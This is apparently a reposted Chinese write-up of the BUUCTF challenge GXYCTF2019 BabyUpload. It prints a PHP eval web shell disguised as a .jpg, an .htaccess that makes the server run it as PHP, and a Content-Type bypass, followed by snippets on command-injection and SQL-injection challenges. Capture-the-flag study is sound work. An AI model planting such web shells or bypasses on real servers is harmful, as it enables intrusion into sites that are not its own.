[GXYCTF2019]BabyUpload-BUUTF

2024-04-24 20:20
文章标签 gxyctf2019 babyupload buutf

本文主要是介绍[GXYCTF2019]BabyUpload-BUUTF,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

题:

步骤(先上传木马,在上传.htaccess)

准备工作

他过滤了<? ,ph等

准备:一句话木马,.htaccess文件

.htaccess SetHandler application/x-httpd-php //解析为php文件
muma1.jpg<script language='php'>eval($_POST['cmd']);</script>     //一句话木马

开始就绪

第一步:上传muma1.jpg再使用bp开始抓包,然后放过,得到他的路径

/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg succesfully uploaded!

第二步:上传.htaccess通过pb抓包修改Content-Type: image/jpeg,再次放过,得到他的路径

/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/.htaccess succesfully uploaded!

第三步:组合得到的路径,进行蚁剑连接

nullicon-default.png?t=N7T8http://aa15f862-d40e-4a4c-8d64-f4b96a2547f6.node5.buuoj.cn:81/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg

第四步:查找flag

方法一,可以直接搜索\flag

方法二,点击第一个\文件夹,直接拉到最下面,有一个flag文件,点开即可

这篇关于[GXYCTF2019]BabyUpload-BUUTF的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/932745

相关文章

NSSCTF中的popchains、level-up、 What is Web、 Interesting_http、 BabyUpload

目录 [NISACTF 2022]popchains  [NISACTF 2022]level-up  [HNCTF 2022 Week1]What is Web [HNCTF 2022 Week1]Interesting_http  [GXYCTF 2019]BabyUpload 今日总结: [NISACTF 2022]popchains  审计可以构造pop链的代码

BUU-[GXYCTF2019]Ping Ping Ping

考察点 命令执行 题目 解题 简单测试 ?ip应该是一个提示,那么就测试一下?ip=127.0.0.1 http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1 发现正常回显 列出文件 那么猜测一下可能会有命令执行漏洞,测试?ip=127.0.0.1;ls http://0

练习 21 Web [GXYCTF2019]BabySQli

SQL联合查询,注意有源码看源码,Base64以及32的区别,MD5碰撞 打开后有登录框,先随意登录尝试 只有输入admin才是返回wrong pass! 其他返回wrong user 所以用户名字段一定要输入admin 养成好习惯,先查看源码 看到一段被注释掉的 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQST

BUUCTF-----[GXYCTF2019]禁止套娃

题目 目录扫描,扫到.git泄露,使用工具查看到index.php的源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';'

练习 5 Web [GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload 猜测直接上传txt会被过滤,提示“上传类型也太露骨了吧!”按经验传入一个"muma.phtml" 提示过滤了“ph”相关的后缀 传入muma.jpg等图像格式,提示表明复原并检测了文件内容 审查文件后缀Context-type 不能有ph,image/jpeg可以 审查文件内容 不能是php 黑名单过滤 查阅wp,需要利用 .htaccess文

[GXYCTF2019]BabyUpload1 -- 题目分析与详解

目录 一、题目分析 1、判断题目类型: 2、上传不同类型的文件进行测试: 二、题目详解 1、写出.htaccess文件: 2、.htaccess 文件配合 .jpg 上传: 3、利用 中国蚁剑/中国菜刀 获取flag: 一、题目分析 1、判断题目类型: 打开靶机,进入靶场,页面如图所示: 判断题目类型为:文件上传漏洞类型。 2、上传不同类型的文件进行测试:

[BUUCTF]-Web:[GXYCTF2019]Ping Ping Ping解析

先看网页 按照正常流程,先ip+ls,可以看到flag 但是不能直接得flag,他应该是过滤掉了一点东西。 这里考虑过滤掉了空格 空格过滤绕过: %20%09${IFS}$IFS$1{IFS}<<> 空格绕过之后发现还是打不开flag.php,但报错语句变了 尝试打开index.php,成功了。 从这里我们可以看出打不开flag.php的原因 代码

[GXYCTF2019]禁止套娃(特详解)

刚打开页面什么都没有,抓包也什么都没有 那就dirsaerch扫一下,发现状态码都是429,访问太快了(这里很多师傅都没有说明或者说清楚) 这里改了一下线程(kali自带的,如果用的脚本要加前面要加python) dirsearch -u http://d4300875-40df-4a49-a897-d48abc13126c.node5.buuoj.cn:81/ -e p

[GXYCTF2019]BabysqliV3.0-phar反序列化

文章目录 前期漏洞探测探测SQL注入探测文件上传探测文件包含漏洞审计源码 宽字节概念函数addslashes() Phar反序列化 前期漏洞探测 探测SQL注入   登陆框。   面对登陆框时,可以使用admin测试盲注。或者使用pw测。   先fuzz一波,返回的都是"no this user",没有防火墙提醒。   存在admin用户。在name中测7种闭合方式

[GXYCTF 2019]BabyUpload

[GXYCTF 2019]BabyUpload wp 页面内容: 在上传文件时,发现 png 后缀名都被过滤了,只能用 jpg ; 此外过滤了 PHP 文件的标志:<?php ,<? ; 后缀名不能带有 ph ; fuzz 了一下,发现后缀名 .htaccess 没被过滤。 后面的我没测了,直接给出我用的文件内容: htaccess.jpg 文件内容: <FilesMatch